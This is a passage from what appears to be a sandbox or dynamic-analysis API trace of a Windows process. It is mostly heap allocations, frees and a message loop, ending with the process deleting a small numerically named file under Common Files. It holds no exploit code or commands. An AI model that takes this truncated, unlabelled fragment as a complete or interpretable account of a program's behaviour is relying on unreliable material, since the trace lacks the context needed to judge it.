hHeap=0xcc0000) returned 1 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33898 | out: hHeap=0xcc0000) returned 1 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20608 | out: hHeap=0xcc0000) returned 1 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb848 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20888 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb620 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb518 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb4b8 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed8fb0 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20568 | out: hHeap=0xcc0000) returned 1 [0274.625] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33898 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33988 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33888 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33888 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33988 | out: hHeap=0xcc0000) returned 1 [0274.625] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33898 | out: hHeap=0xcc0000) returned 1 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20568 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xed8fb0 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb4b8 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb7a0 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb518 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb5a8 [0274.625] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb620 [0274.626] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20888 [0274.626] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb848 [0274.626] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33898 [0274.626] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33898 | out: hHeap=0xcc0000) returned 1 [0274.626] CloseHandle (hObject=0x5dc) returned 1 [0274.626] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xcc0000) returned 1 [0274.626] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33908 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf71df0 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40f40 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb548 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20798 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb848 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20888 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed8fb0 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb4b8 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb518 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb620 | out: hHeap=0xcc0000) returned 1 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20568 | out: hHeap=0xcc0000) returned 1 [0274.627] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0274.627] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33978 [0274.627] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20568 [0274.627] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb620 [0274.627] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33908 [0274.627] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33908 | out: hHeap=0xcc0000) returned 1 [0274.627] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5a8 [0274.628] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33908 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33908 | out: hHeap=0xcc0000) returned 1 [0274.628] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7a0 [0274.628] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33908 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33908 | out: hHeap=0xcc0000) returned 1 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb620 | out: hHeap=0xcc0000) returned 1 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20568 | out: hHeap=0xcc0000) returned 1 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee4860 | out: hHeap=0xcc0000) returned 1 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb758 | out: hHeap=0xcc0000) returned 1 [0274.628] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20388 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a08 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20360 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbaa0 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9310 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a18 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20338 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb60 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20400 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339e8 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf203d8 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb878 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba58 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339f8 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf203b0 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9400 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed93d0 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e48 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a38 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf202c0 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb48 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba70 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20248 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a48 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf1fde8 | out: hHeap=0xcc0000) returned 1 [0274.629] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb8c0 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb980 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339a8 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf204f0 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb18 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20310 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a28 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf202e8 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba40 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf204c8 | out: hHeap=0xcc0000) returned 1 [0274.630] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339b8 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf204a0 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9520 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20478 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339c8 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20450 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9640 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb890 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339d8 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20428 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9550 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9370 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33998 | out: hHeap=0xcc0000) returned 1 [0274.631] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20518 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb968 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a98 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a78 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf1ff28 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd26ff8 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a88 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9610 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed95b0 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd27080 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20298 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a58 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94f0 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbba8 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9460 | out: hHeap=0xcc0000) returned 1 [0274.632] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf200b8 | out: hHeap=0xcc0000) returned 1 [0274.632] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0274.632] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0274.632] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 0 [0274.633] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0274.633] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0274.633] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a58 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20a) returned 0xd07380 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a68 [0274.633] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd07380 | out: hHeap=0xcc0000) returned 1 [0274.633] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a68 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0274.633] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.633] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0274.633] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a58 | out: hHeap=0xcc0000) returned 1 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40f40 [0274.633] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf200b8 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9460 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a58 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbba8 [0274.633] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a68 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94f0 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a88 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e48 [0274.634] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94f0 | out: hHeap=0xcc0000) returned 1 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94f0 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x80) returned 0xd27080 [0274.634] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e48 | out: hHeap=0xcc0000) returned 1 [0274.634] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94f0 | out: hHeap=0xcc0000) returned 1 [0274.634] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.634] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0274.634] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a58 | out: hHeap=0xcc0000) returned 1 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94f0 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a58 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a68 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a78 [0274.634] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", nBufferLength=0x7fff, lpBuffer=0x8cf760, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFilePart=0x0) returned 0x1f [0274.634] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94f0 | out: hHeap=0xcc0000) returned 1 [0274.634] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee4860 [0274.635] GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 0x20 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94f0 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a98 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed95b0 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9610 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ad8 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb968 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33998 [0274.635] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9610 | out: hHeap=0xcc0000) returned 1 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20298 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf339d8 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48a8 [0274.635] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed95b0 | out: hHeap=0xcc0000) returned 1 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e48 [0274.635] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0274.635] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.635] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48a8 | out: hHeap=0xcc0000) returned 1 [0274.635] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339d8 | out: hHeap=0xcc0000) returned 1 [0274.636] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb968 | out: hHeap=0xcc0000) returned 1 [0274.636] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33998 | out: hHeap=0xcc0000) returned 1 [0274.636] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20298 | out: hHeap=0xcc0000) returned 1 [0274.636] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0274.636] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e48 | out: hHeap=0xcc0000) returned 1 [0274.636] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0274.636] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94f0 | out: hHeap=0xcc0000) returned 1 [0274.636] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a98 | out: hHeap=0xcc0000) returned 1 [0274.636] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFindFileData=0x8df7a8 | out: lpFindFileData=0x8df7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x45044ab0, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x45066d90, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x8df7e0, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0xf40e80 [0274.636] DeleteFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 1 [0274.638] FindNextFileW (in: hFindFile=0xf40e80, lpFindFileData=0x8df7a8 | out: lpFindFileData=0x8df7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x45044ab0, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x45066d90, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x8df7e0, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0 [0274.638] FindClose (in: hFindFile=0xf40e80 | out: hFindFile=0xf40e80) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a78 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a68 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee4860 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a58 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd27080 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a88 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbba8 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9460 | out: hHeap=0xcc0000) returned 1 [0274.639] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf200b8 | out: hHeap=0xcc0000) returned 1 [0274.639] PeekMessageW (in: 